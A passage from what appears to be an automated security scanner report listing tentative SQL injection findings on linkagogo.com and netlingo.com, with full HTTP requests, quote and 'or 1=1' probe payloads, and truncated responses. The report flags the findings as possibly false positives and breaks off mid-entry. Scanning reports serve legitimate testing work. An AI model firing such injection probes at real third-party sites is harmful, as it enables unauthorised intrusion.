border-style:solid;
border-width:4;
border-color:#CCCCFF;
background-color:#FFFFC6;
padding:2px;
font-family:Arial;
font-
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:40 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27exHo"
Last-Modified: Tue, 25 Jan 2011 04:42:41 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16308
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:42:39 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:42:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_smart.xml" title="linkaGoGo Smart Bookmarks" />
<META HTTP-EQUIV="Expires" CONTENT="0">
<head><title>Add bookmark</title>
<style>
a:link {color:#0000FF}
a:visited {color:#800080}
a.menu {text-decoration:none;color:#000000;background:#9999FF }
a.menu2 {text-decoration:none;color:#000000;background:#CCCCFF }
a.menu:link {color:#000000}
a.menu:visited {color:#000000}
a.menu:hover {color:white;background:#0000C0}
a.menu:active {color:#000000;background:#9999FF}
a.menu2:link {color:#000000}
a.menu2:visited {color:#000000}
a.menu2:hover {color:white;background:#0000C0}
a.menu2:active {color:#000000;background:#CCCCFF}
a.donate {text-decoration:none;color:#000000;background:#9999FF}
a.donate:link {color:#000000}
a.donate:visited {color:#000000}
a.donate:hover {color:white;background:#0000C0}
a.donate:active {color:#000000;background:#9999FF}
.menuskin{position:absolute;width:165px;background-color:#FFFFC6;border:2px solid silver;font:normal 12px verdana;line-height:16px;z-index:100;visibility:hidden;}
.menuskin a{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}
.menuskin a:visited{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}

#mouseoverstyle{background-color:highlight;}
#mouseoverstyle a{color:white;}
a.pl:hover {color:white;background:#0000C0}
.popup
{
position:absolute; left:0; top:2; width:132;
border-style:solid;
border-width:4;
border-color:#CCCCFF;
background-color:#FFFFC6;
padding:2px;
font-family:Arial;
font-size:10pt;
z-index:2;
vis
...[SNIP]...

1.61. http://www.linkagogo.com/go/AddNoPopup [url parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.linkagogo.com
Path:	/go/AddNoPopup

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. The payloads 18557380'%20or%201%3d1--%20 and 18557380'%20or%201%3d2--%20 were each submitted in the url parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /go/AddNoPopup?url={u}18557380'%20or%201%3d1--%20&title={t} HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:13 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27eqhw"
Last-Modified: Tue, 25 Jan 2011 04:42:14 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16332
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:42:13 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:42:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_smart.xml" title="linkaGoGo Smart Bookmarks" />
<META HTTP-EQUIV="Expires" CONTENT="0">
<head><title>Add bookmark</title>
<style>
a:link {color:#0000FF}
a:visited {color:#800080}
a.menu {text-decoration:none;color:#000000;background:#9999FF }
a.menu2 {text-decoration:none;color:#000000;background:#CCCCFF }
a.menu:link {color:#000000}
a.menu:visited {color:#000000}
a.menu:hover {color:white;background:#0000C0}
a.menu:active {color:#000000;background:#9999FF}
a.menu2:link {color:#000000}
a.menu2:visited {color:#000000}
a.menu2:hover {color:white;background:#0000C0}
a.menu2:active {color:#000000;background:#CCCCFF}
a.donate {text-decoration:none;color:#000000;background:#9999FF}
a.donate:link {color:#000000}
a.donate:visited {color:#000000}
a.donate:hover {color:white;background:#0000C0}
a.donate:active {color:#000000;background:#9999FF}
.menuskin{position:absolute;width:165px;background-color:#FFFFC6;border:2px solid silver;font:normal 12px verdana;line-height:16px;z-index:100;visibility:hidden;}
.menuskin a{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}
.menuskin a:visited{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}

#mouseoverstyle{background-color:highlight;}
#mouseoverstyle a{color:white;}
a.pl:hover {color:white;background:#0000C0}
.popup
{
position:absolute; left:0; top:2; width:132;
border-style:solid;
border-width:4;
border-color:#CCCCFF;
background-color:#FFFFC6;
padding:2px;
font-family:Arial;
font-
...[SNIP]...

Request 2

GET /go/AddNoPopup?url={u}18557380'%20or%201%3d2--%20&title={t} HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:14 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27eqxY"
Last-Modified: Tue, 25 Jan 2011 04:42:15 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16332
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:42:14 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:42:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_smart.xml" title="linkaGoGo Smart Bookmarks" />
<META HTTP-EQUIV="Expires" CONTENT="0">
<head><title>Add bookmark</title>
<style>
a:link {color:#0000FF}
a:visited {color:#800080}
a.menu {text-decoration:none;color:#000000;background:#9999FF }
a.menu2 {text-decoration:none;color:#000000;background:#CCCCFF }
a.menu:link {color:#000000}
a.menu:visited {color:#000000}
a.menu:hover {color:white;background:#0000C0}
a.menu:active {color:#000000;background:#9999FF}
a.menu2:link {color:#000000}
a.menu2:visited {color:#000000}
a.menu2:hover {color:white;background:#0000C0}
a.menu2:active {color:#000000;background:#CCCCFF}
a.donate {text-decoration:none;color:#000000;background:#9999FF}
a.donate:link {color:#000000}
a.donate:visited {color:#000000}
a.donate:hover {color:white;background:#0000C0}
a.donate:active {color:#000000;background:#9999FF}
.menuskin{position:absolute;width:165px;background-color:#FFFFC6;border:2px solid silver;font:normal 12px verdana;line-height:16px;z-index:100;visibility:hidden;}
.menuskin a{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}
.menuskin a:visited{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}

#mouseoverstyle{background-color:highlight;}
#mouseoverstyle a{color:white;}
a.pl:hover {color:white;background:#0000C0}
.popup
{
position:absolute; left:0; top:2; width:132;
border-style:solid;
border-width:4;
border-color:#CCCCFF;
background-color:#FFFFC6;
padding:2px;
font-family:Arial;
font-size:10pt;
z-index:2;
vis
...[SNIP]...

1.62. http://www.netlingo.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.netlingo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:26:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 19

Oops, Fatal Error 1

Request 2

GET /?1''=1 HTTP/1.1
Host: www.netlingo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:26:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 46138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.63. http://www.netlingo.com/add-edit/editor-guidelines.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/add-edit/editor-guidelines.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /add-edit/editor-guidelines.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /add-edit/editor-guidelines.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 39420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.64. http://www.netlingo.com/advertise/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/advertise/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /advertise/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /advertise/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.65. http://www.netlingo.com/advertise/licensing.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/advertise/licensing.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /advertise/licensing.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /advertise/licensing.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.66. http://www.netlingo.com/advertise/payments.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/advertise/payments.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /advertise/payments.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /advertise/payments.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.67. http://www.netlingo.com/advertise/sponsorships.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/advertise/sponsorships.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /advertise/sponsorships.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /advertise/sponsorships.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.68. http://www.netlingo.com/archive.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/archive.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /archive.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /archive.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.69. http://www.netlingo.com/by-category/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/by-category/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /by-category/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /by-category/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.70. http://www.netlingo.com/category/acronyms.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/category/acronyms.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/acronyms.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/acronyms.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 163340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.71. http://www.netlingo.com/category/business.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/category/business.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/business.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/business.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 83555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.72. http://www.netlingo.com/category/hardware.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/category/hardware.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/hardware.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/hardware.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 46206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.73. http://www.netlingo.com/category/marketing.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/category/marketing.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/marketing.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/marketing.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 46870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.74. http://www.netlingo.com/category/net-organization.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/category/net-organization.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/net-organization.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/net-organization.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 50980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.75. http://www.netlingo.com/category/programming.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/category/programming.php

Issue detail

